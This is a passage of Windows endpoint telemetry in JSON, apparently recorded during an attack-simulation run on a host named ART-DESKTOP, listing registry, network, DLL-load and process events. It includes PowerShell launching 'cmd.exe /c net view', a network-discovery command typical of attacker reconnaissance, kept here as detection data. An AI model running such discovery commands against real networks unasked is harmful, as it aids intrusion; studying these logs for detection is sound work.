NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "139", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50503", - "subtype": "outgoing", - "timestamp": 131883571877130000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.255", - "destination_port": "138", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "138", - "subtype": "outgoing", - "timestamp": 131883571877190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.134", - "destination_port": "138", - "event_type": "network", - "pid": 4, - 
"process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "138", - "subtype": "incoming", - "timestamp": 131883571877190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.254", - "destination_port": "67", - "event_type": "network", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "68", - "subtype": "outgoing", - "timestamp": 131883571884160000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "destination_address": "192.168.162.254", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883571887450016, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "137", - "subtype": "incoming", - "timestamp": 131883571922940000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "138", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": 
"udp", - "source_address": "192.168.162.134", - "source_port": "138", - "subtype": "incoming", - "timestamp": 131883571922940000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "process", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "process", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8124, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571956180000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": 
"{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "command_line": "net view", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1744, - "ppid": 8124, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883571956270016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}", - "unique_ppid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1744, - "process_name": 
"net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": 
"{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": 
"C:\\Windows\\System32\\srvcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\IdentityCRL\\ClockData", - "registry_value": "ClockData", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883571968400000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883571968400000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_value": "DiagTrack", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulUploadTime", - "registry_value": "LastSuccessfulUploadTime", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_value": "DiagTrack", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulNormalUploadTime", - "registry_value": "LastSuccessfulNormalUploadTime", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "destination_address": "52.114.128.8", - "destination_port": "443", - "event_type": "network", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - 
"source_address": "192.168.162.134", - "source_port": "50504", - "subtype": "outgoing", - "timestamp": 131883571967820000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "process", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "process", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3276, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883572002260000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": 
"{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002300000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "process", - 